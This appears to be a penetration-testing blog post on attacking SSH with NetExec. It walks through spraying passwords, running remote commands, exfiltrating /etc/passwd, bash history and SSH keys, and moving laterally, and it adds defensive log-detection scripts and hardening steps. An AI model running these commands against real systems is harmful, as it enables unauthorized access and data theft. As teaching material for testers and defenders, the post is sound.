
Introduction:
Secure Shell (SSH) is the backbone of Linux remote administration, yet weak credentials and misconfigurations remain the Achilles’ heel of enterprise security. The NetExec framework (NXC), the community-driven successor to CrackMapExec, equips penetration testers with a unified interface to validate credentials, execute commands, and transfer files across SSH, SMB, LDAP, and WinRM, automating the initial foothold to lateral movement chain.
Learning Objectives:
- Master credential spraying and brute-force attacks against SSH services using NXC.
- Execute remote system commands and perform silent file exfiltration over SSH.
- Implement defensive hardening measures including key-based authentication, Fail2ban, and MITRE ATT&CK-aligned monitoring.
You Should Know:
1. NetExec Arsenal: Credential Spraying and Brute Force
NetExec transforms password guessing from a noisy, slow process into a surgical, high-speed operation. Attackers rarely target a single account; they spray one or two common passwords across hundreds of usernames to avoid lockouts. The `nxc ssh` module automates this against SSH targets.
Step‑by‑Step Guide:
- Installation (Kali Linux):
`sudo apt update && sudo apt install netexec -y`
Alternative pipx install:
`sudo apt install pipx git && pipx install git+https://github.com/Pennyw0rth/NetExec.git`
- Manual Build (for latest features):
`git clone https://github.com/Pennyw0rth/NetExec.git`
`cd NetExec`
`virtualenv env && source env/bin/activate`
`pip install pyinstaller . && pyinstaller netexec.spec`
`./dist/nxc`
On Windows: use `env\Scripts\activate` and `./dist/nxc.exe`
- Credential Spraying (one password against many usernames):
`nxc ssh 192.168.1.52 -u users.txt -p 'Spring2025!'`
This tests the same password across all listed usernames, minimizing lockout risk.
- Brute Force (multiple passwords against multiple usernames):
`nxc ssh 192.168.1.0/24 -u admin.txt -p passwords.txt --continue-on-success`
The `--continue-on-success` flag ensures the scan doesn't stop after finding one valid credential.
- Validate Discovered Credentials:
`nxc ssh 192.168.1.52 -u ignite -p '123'`
A single-login attempt removes false positives and confirms a working access vector.
Pro Tip: Use the `nxc_bruter` Bash utility to loop through service lists and pass credential files directly to NXC. It supports NTLM hashes and Kerberos tickets, enabling Pass-the-Hash attacks across SMB, SSH, and WinRM.
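The defender's view of the spraying and brute-force runs above, as an added example that is not part of the original post or of the NetExec project: a Python detector for the footprint that one password against many usernames (and many passwords against one username) leaves in OpenSSH's `auth.log`, plus the event that matters most, a successful login from a source that was just spraying. The log lines are constructed for this example in OpenSSH's syslog format, and the window and threshold values are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth.log lines (syslog format, no year). "invalid user" appears when the account does not exist.
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample: one spray (5 users, 1 attempt each, then a success), one slow brute force, one stray.
SAMPLE_LOG = """\
Jan 12 10:15:01 web01 sshd[2201]: Failed password for invalid user alice from 192.168.1.10 port 51234 ssh2
Jan 12 10:15:02 web01 sshd[2202]: Failed password for bob from 192.168.1.10 port 51235 ssh2
Jan 12 10:15:03 web01 sshd[2203]: Failed password for invalid user carol from 192.168.1.10 port 51236 ssh2
Jan 12 10:15:04 web01 sshd[2204]: Failed password for dave from 192.168.1.10 port 51237 ssh2
Jan 12 10:15:05 web01 sshd[2205]: Failed password for invalid user erin from 192.168.1.10 port 51238 ssh2
Jan 12 10:15:06 web01 sshd[2206]: Accepted password for ignite from 192.168.1.10 port 51239 ssh2
Jan 12 10:20:00 web01 sshd[2300]: Failed password for ignite from 192.168.1.77 port 40001 ssh2
Jan 12 10:20:30 web01 sshd[2301]: Failed password for ignite from 192.168.1.77 port 40002 ssh2
Jan 12 11:00:00 web01 sshd[2400]: Failed password for ignite from 192.168.1.77 port 40003 ssh2
Jan 12 14:30:00 web01 sshd[2500]: Failed password for root from 10.0.0.5 port 33000 ssh2
""".splitlines()


def parse_auth_log(lines, year=2025):
    """Return (timestamp, ip, user, result) tuples; syslog lines carry no year, so one is supplied."""
    events = []
    for line in lines:
        m = AUTH_RE.search(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"]))
    return events


def _max_in_window(timestamps, window_seconds):
    """Largest number of events that fall inside any window of window_seconds (sliding window)."""
    timestamps = sorted(timestamps)
    best, start = 0, 0
    for end, t in enumerate(timestamps):
        while (t - timestamps[start]).total_seconds() > window_seconds:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_spray(events, window_seconds=600, min_users=5):
    """Sources that fail against >= min_users distinct accounts inside one window.

    One attempt per account from a single source is exactly what spraying produces; a per-account
    lockout counter never trips on it, which is why the count has to be keyed by source, not by user."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in events:
        if result == "Failed":
            by_ip[ip].append((ts, user))
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort()
        start, live = 0, defaultdict(int)          # live: usernames currently inside the window
        for end, (ts, user) in enumerate(evs):
            live[user] += 1
            while (ts - evs[start][0]).total_seconds() > window_seconds:
                old = evs[start][1]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                start += 1
            if len(live) >= min_users:
                hits[ip] = sorted({u for _, u in evs})
                break
    return hits


def detect_bruteforce(events, window_seconds=600, min_attempts=5):
    """(ip, user) pairs hammered >= min_attempts times inside one window (password-list style)."""
    by_pair = defaultdict(list)
    for ts, ip, user, result in events:
        if result == "Failed":
            by_pair[(ip, user)].append(ts)
    return {pair: n for pair, ts_list in by_pair.items()
            if (n := _max_in_window(ts_list, window_seconds)) >= min_attempts}


def successes_after_spray(events, spray_hits):
    """Accepted logins from a source already flagged for spraying: the foothold worth paging on."""
    return [(ts.isoformat(), ip, user) for ts, ip, user, result in events
            if result == "Accepted" and ip in spray_hits]


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_LOG)
    spray = detect_spray(evs)
    print("spraying sources:", spray)
    print("brute-forced accounts:", detect_bruteforce(evs, min_attempts=2))
    print("logins from spraying sources:", successes_after_spray(evs, spray))
```

The slow brute force at 192.168.1.77 (three attempts spread over forty minutes) stays below a 600-second window with the default threshold, which is the "low-and-slow" gap the closing section mentions; widening the window or correlating across hosts is the usual answer.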
2. Remote Command Execution and Post-Exploitation Recon
Once NXC validates SSH credentials, the true power emerges: executing arbitrary commands on the remote system without interactive login. This enables deep system enumeration, persistence installation, and lateral movement preparation.
Step‑by‑Step Guide:
- Execute a Single Command:
`nxc ssh 192.168.1.52 -u ignite -p '123' -x 'id && hostname && whoami'`
The `-x` parameter runs the command on the remote target. This example quickly identifies user privileges, system name, and current user context.
- Run a Script Over SSH:
Create a local script `enum.sh` and execute it remotely:
`nxc ssh 192.168.1.52 -u ignite -p '123' -X enum.sh`
The `-X` flag uploads and executes the script in one atomic operation.
- Enumerate Network Configuration:
`nxc ssh 192.168.1.52 -u ignite -p '123' -x 'ifconfig -a && netstat -tulpn | grep LISTEN'`
This reveals active network interfaces and listening ports, mapping the attack surface for lateral movement.
- Collect System Information:
`nxc ssh 192.168.1.52 -u ignite -p '123' -x 'cat /etc/os-release; uname -a; ps aux'`
Gathers OS version, kernel details, and running processes, identifying potential privilege escalation vectors.
- Windows Target via SSH (if OpenSSH server is installed):
`nxc ssh 192.168.1.100 -u administrator -p 'Pass123' -x 'systeminfo | findstr /B /C:"OS Name" /C:"OS Version"'`
Mitigation: Disable password authentication entirely in `/etc/ssh/sshd_config` by setting `PasswordAuthentication no` and `ChallengeResponseAuthentication no`. Use SSH key pairs with strong passphrases, and consider using the `sshd_config` `AllowUsers` and `DenyUsers` directives to restrict login by user or group.
3. File Transfer: Uploading Payloads and Exfiltrating Sensitive Data
File transfer over SSH is often an afterthought, but NetExec makes it a first-class operation. Attackers use encrypted SSH channels to stage malicious tools, exfiltrate password files, and pivot between hosts while staying under the radar.
Step‑by‑Step Guide:
- Upload a Tool to the Target:
`nxc ssh 192.168.1.52 -u ignite -p '123' --put-file /tmp/linpeas.sh /tmp/linpeas.sh`
The `--put-file` parameter transfers a local file to the remote system. This is ideal for staging privilege escalation scanners like LinPEAS or reverse shell payloads.
- Download a Sensitive File from the Target:
`nxc ssh 192.168.1.52 -u ignite -p '123' --get-file /etc/passwd /home/attacker/passwd_exfil.txt`
The `--get-file` parameter retrieves a remote file. `/etc/passwd` is a classic target for user enumeration, but attackers also grab SSH private keys (`~/.ssh/id_rsa`), configuration files, and database dumps.
- Exfiltrate Multiple Files by Archiving Them First:
`nxc ssh 192.168.1.52 -u ignite -p '123' -x 'tar czf /tmp/configs.tgz /etc/nginx /etc/apache2'`
First compress the target directories, then download the archive:
`nxc ssh 192.168.1.52 -u ignite -p '123' --get-file /tmp/configs.tgz /home/attacker/configs.tgz`
- Cross-Protocol File Transfer:
NXC unifies syntax across protocols: the same `--put-file` and `--get-file` flags work for SMB, FTP, NFS, and MS-SQL. Attackers pivot from SSH to SMB to exfiltrate data without switching tools.
Defensive Controls:
- Monitor SSH logs for repeated `--get-file` operations on sensitive paths (`/etc/shadow`, `.ssh/`, `/var/backups`).
- Implement file integrity monitoring (AIDE, Tripwire) to detect unauthorized file transfers.
- Restrict SFTP/SCP access via the `sshd_config` `Subsystem sftp internal-sftp` and `ChrootDirectory` directives.
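One way to act on the first defensive control above, as an added example that is not part of the original post or of the NetExec project: `--get-file` and `--put-file` run over the SFTP subsystem, and `internal-sftp` logs every file it opens under `sshd[pid]` once logging is turned on (for instance `Subsystem sftp internal-sftp -l INFO`, an assumption about the operator's configuration). The Python below parses those lines, tags reads of the watch-listed paths from the control list plus `/etc/passwd` from the exfiltration step, and flags sessions that pull many files, which is what the archive-then-download pattern looks like when the archive itself sits in `/tmp`. The log lines are constructed for this example in the `open "path" flags ... mode ...` format `internal-sftp` emits; treat the exact wording as an assumption to confirm against your own `auth.log`.

```python
import re
from collections import defaultdict

# internal-sftp log lines as written under sshd[pid] (assumed format; the sample below is constructed).
SESSION_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: session opened for local user (?P<user>\S+) from \[(?P<ip>[^\]]+)\]"
)
OPEN_RE = re.compile(r"sshd\[(?P<pid>\d+)\]: open \"(?P<path>[^\"]+)\" flags (?P<flags>\S+) mode")

# Watch list: the paths the defensive-controls step names, plus /etc/passwd from the exfiltration step.
SENSITIVE_PREFIXES = ("/etc/shadow", "/etc/passwd", "/var/backups/")

# Constructed sample: one session collecting credentials and a backup, one ordinary deployment upload.
SAMPLE_SFTP_LOG = """\
Jan 12 10:16:00 web01 sshd[2310]: session opened for local user ignite from [192.168.1.10]
Jan 12 10:16:01 web01 sshd[2310]: open "/etc/passwd" flags READ mode 0666
Jan 12 10:16:02 web01 sshd[2310]: open "/home/ignite/.ssh/id_rsa" flags READ mode 0666
Jan 12 10:16:03 web01 sshd[2310]: open "/tmp/configs.tgz" flags READ mode 0666
Jan 12 10:16:04 web01 sshd[2310]: open "/var/backups/db.sql.gz" flags READ mode 0666
Jan 12 10:16:30 web01 sshd[2310]: session closed for local user ignite from [192.168.1.10]
Jan 12 11:00:00 web01 sshd[2500]: session opened for local user deploy from [10.0.0.8]
Jan 12 11:00:01 web01 sshd[2500]: open "/var/www/app/release.tgz" flags WRITE,CREATE,TRUNCATE mode 0644
""".splitlines()


def is_sensitive(path):
    """True for a watch-listed prefix or for any path that passes through a .ssh directory."""
    return path.startswith(SENSITIVE_PREFIXES) or "/.ssh/" in path


def parse_sftp_log(lines):
    """Map SFTP session pid -> {'user', 'ip', 'reads': [paths], 'writes': [paths]}.

    The pid is the join key: the 'session opened' line carries the user and source address, while
    each later 'open' line only carries the pid and the path."""
    sessions = defaultdict(lambda: {"user": None, "ip": None, "reads": [], "writes": []})
    for line in lines:
        m = SESSION_RE.search(line)
        if m:
            sessions[m["pid"]]["user"] = m["user"]
            sessions[m["pid"]]["ip"] = m["ip"]
            continue
        m = OPEN_RE.search(line)
        if m:
            bucket = "reads" if m["flags"] == "READ" else "writes"   # a download opens READ, an upload WRITE,...
            sessions[m["pid"]][bucket].append(m["path"])
    return dict(sessions)


def sensitive_reads(sessions):
    """(user, ip, path) for every watch-listed file pulled from the host."""
    return [(s["user"], s["ip"], p) for s in sessions.values() for p in s["reads"] if is_sensitive(p)]


def bulk_readers(sessions, threshold=3):
    """Sessions that read at least `threshold` files; catches collection that never touches a listed path."""
    return {pid: len(s["reads"]) for pid, s in sessions.items() if len(s["reads"]) >= threshold}


if __name__ == "__main__":
    sess = parse_sftp_log(SAMPLE_SFTP_LOG)
    for user, ip, path in sensitive_reads(sess):
        print(f"sensitive read: {user}@{ip} -> {path}")
    print("bulk readers:", bulk_readers(sess))
```

Note that `/tmp/configs.tgz` is only caught by the volume rule, not by the path rule: an archive built with `-x 'tar czf ...'` carries none of the watch-listed names, so the file-open count per session is the control that covers that step.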
4. Post‑Access Reconnaissance and Privilege Escalation
After gaining initial access, attackers systematically enumerate the system for misconfigurations, credential caches, and network trust relationships. NXC’s modular architecture integrates with common post‑exploitation frameworks.
Step‑by‑Step Guide:
- Enumerate Sudo Privileges:
`nxc ssh 192.168.1.52 -u ignite -p '123' -x 'sudo -l'`
Identifies commands the user can run with elevated privileges without a password.
- Check for SUID Binaries:
`nxc ssh 192.168.1.52 -u ignite -p '123' -x 'find / -perm -4000 -type f 2>/dev/null'`
SUID binaries are common privilege escalation vectors; attackers look for misconfigured or vulnerable executables.
- Harvest SSH Keys from User Homes:
`nxc ssh 192.168.1.52 -u ignite -p '123' -x 'find /home -name "id_rsa" -o -name "id_dsa" 2>/dev/null'`
Stolen SSH keys enable lateral movement to other systems where the key owner has access.
- Extract Bash History:
`nxc ssh 192.168.1.52 -u ignite -p '123' --get-file ~/.bash_history /tmp/bash_history.txt`
Command history often contains plaintext passwords, internal hostnames, and database connection strings.
Lateral Movement Example:
After harvesting an SSH key from `~/.ssh/id_rsa` on the first host, use it to authenticate to a second host:
`nxc ssh 192.168.1.53 -u sameuser --key-file ~/.ssh/id_rsa -x 'whoami'`
This bypasses password authentication entirely and often goes undetected by traditional logging.
5. Hardening SSH Against NetExec and Automated Attacks
Defenders must assume attackers possess tools like NXC. Proactive hardening significantly raises the cost of compromise.
Step‑by‑Step Guide:
- Disable Password Authentication (Ubuntu/Debian/CentOS):
Edit `/etc/ssh/sshd_config`:
`PasswordAuthentication no`
`ChallengeResponseAuthentication no`
`PermitRootLogin prohibit-password`
Then restart SSH: `sudo systemctl restart sshd`
- Install and Configure Fail2ban:
`sudo apt install fail2ban -y`
`sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local`
Edit `jail.local` and add the following under the SSH jail section, which is named `[sshd]`:
`[sshd]`
`enabled = true`
`port = ssh`
`maxretry = 3`
`bantime = 3600`
`findtime = 600`
Then restart: `sudo systemctl restart fail2ban`
- Change Default SSH Port (obscurity, not security, but reduces automated scans):
In `/etc/ssh/sshd_config`: `Port 2222`
Update firewall rules and Fail2ban accordingly.
- Implement Firewall Rate Limiting (using iptables):
`sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -m recent --set`
`sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 4 -j DROP`
This drops new connections from a source that exceeds 4 attempts in 60 seconds.
- Use SSH Key Whitelisting:
Restrict which keys can authenticate by adding `from=` and `command=` restrictions to entries in `~/.ssh/authorized_keys`. For example:
`from="192.168.1.0/24",command="/usr/bin/rsync --server --sender -v . /" ssh-rsa AAAAB3...`
- Monitor with Auditd:
`sudo auditctl -w /etc/ssh/sshd_config -p wa -k ssh_config_change`
`sudo auditctl -w /var/log/auth.log -p r -k ssh_auth_log`
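A check that the first and fifth hardening steps actually landed, as an added example that is not part of the original post or of the NetExec project: a Python audit that reads `sshd_config` for the three directives above and reads `authorized_keys` for entries that carry no `from=` restriction. Both configuration texts below are constructed for this example, with a weak one beside the hardened one; the key blobs are placeholders, not real keys. Assumptions, stated here and in the comments: only global directives (those before the first `Match` block) are judged, and `Include`d drop-in files are not followed, so on Debian-derived systems compare against `sshd -T` as well.

```python
import re

# Hardened values from the article's sshd_config step. OpenSSH keywords are case-insensitive and the
# FIRST occurrence of a keyword wins, which is why parse_sshd_config keeps the first value it sees.
EXPECTED = {
    "passwordauthentication": "no",
    "challengeresponseauthentication": "no",
    "permitrootlogin": "prohibit-password",
}

# Constructed: a typical untouched configuration. The commented-out line is the common mistake:
# PasswordAuthentication defaults to yes when the directive is absent.
WEAK_SSHD_CONFIG = """\
Include /etc/ssh/sshd_config.d/*.conf
Port 22
#PasswordAuthentication no
ChallengeResponseAuthentication yes
PermitRootLogin yes
"""

# Constructed: the article's settings applied, with an AllowUsers list and a conditional Match block.
HARDENED_SSHD_CONFIG = """\
Port 2222
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin prohibit-password
AllowUsers ignite deploy
Match User deploy
    PasswordAuthentication yes
"""

# Constructed authorized_keys: one entry restricted as in the article, two that any source may use.
AUTHORIZED_KEYS = """\
# placeholders, not real keys
from="192.168.1.0/24",command="/usr/bin/rsync --server --sender -v . /" ssh-rsa AAAAB3PLACEHOLDER backup@web01
ssh-ed25519 AAAAC3PLACEHOLDER laptop@home
no-pty,command="/usr/local/bin/healthcheck" ssh-ed25519 AAAAC3PLACEHOLDER2 monitor@nagios
"""

# options (optional) + key type + base64 blob + optional comment; quoted option values may contain spaces.
KEY_LINE_RE = re.compile(
    r"^(?:(?P<opts>\S.*?)\s+)?(?P<type>ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp\d{3})\s+"
    r"(?P<blob>\S+)(?:\s+(?P<comment>.*))?$"
)


def parse_sshd_config(text):
    """Return {keyword_lower: first_value} for global directives; stops at the first Match block.
    Include'd files are not followed (assumption/limit of this audit)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):     # sshd treats only whole-line '#' as comments
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in settings:
            settings[key] = parts[1].strip()
    return settings


def audit_sshd_config(text):
    """List (keyword, found_value_or_None, expected) for each directive that is missing or differs."""
    settings = parse_sshd_config(text)
    return [(key, settings.get(key), want) for key, want in EXPECTED.items()
            if settings.get(key) is None or settings[key].lower() != want]


def unrestricted_keys(text):
    """(comment, has_command) for every key that lacks a from= option, i.e. usable from any source."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_LINE_RE.match(line)
        if not m:
            continue
        opts = m["opts"] or ""
        if not re.search(r"(?:^|,)from=", opts):
            has_command = bool(re.search(r"(?:^|,)command=", opts))
            out.append((m["comment"] or m["blob"][:12], has_command))
    return out


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, audit_sshd_config(cfg) or "OK")
    print("keys without from= restriction:", unrestricted_keys(AUTHORIZED_KEYS))
```

A key with `command=` but no `from=` (the `monitor@nagios` entry) still limits what a stolen key can run, which is why the result carries that flag separately; a key with neither is the one to fix first.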
What Undercode Say:
- Credential hygiene remains the weakest link. Even with perfect SSH configuration, reused or weak passwords render all other defenses moot. NXC demonstrates how quickly an attacker can validate and weaponize leaked credentials.
- Automated tools shift the defender’s calculus. Traditional log monitoring fails against low-and-slow credential spraying. Defenders must implement account lockout policies, geofencing, and behavioral analytics to detect NXC-like patterns.
- File transfer over SSH is a blind spot. Most organizations monitor web and email exfiltration but overlook encrypted SSH channels. Inline SSH inspection proxies or endpoint detection solutions are critical to catch `–get-file` operations on sensitive data.
- MITRE ATT&CK provides a common language. Mapping NXC techniques to T1078 (Valid Accounts), T1021.004 (Remote Services: SSH), and T1105 (Ingress Tool Transfer) enables purple team exercises and measurable security improvements.
- Layer your defenses. No single control stops a determined attacker. Combine key-based authentication, Fail2ban, port knocking, micro-segmentation, and continuous monitoring to frustrate NXC-based attacks.
Prediction:
As SSH remains the default remote access protocol for Linux and cloud workloads, credential abuse will continue to dominate initial access vectors. NetExec and similar frameworks will evolve to integrate AI-driven password guessing, automate lateral movement across hybrid cloud environments, and bypass advanced logging via SSH tunneling. Defenders will shift toward zero-trust models, ephemeral SSH certificates, and continuous authentication—rendering long-lived credentials obsolete within 24–36 months. Organizations that fail to move beyond password-based SSH authentication will face inevitable compromise, not if, but when.
Reported By: Nxc For – Hackers Feeds
Extra Hub: Undercode MoN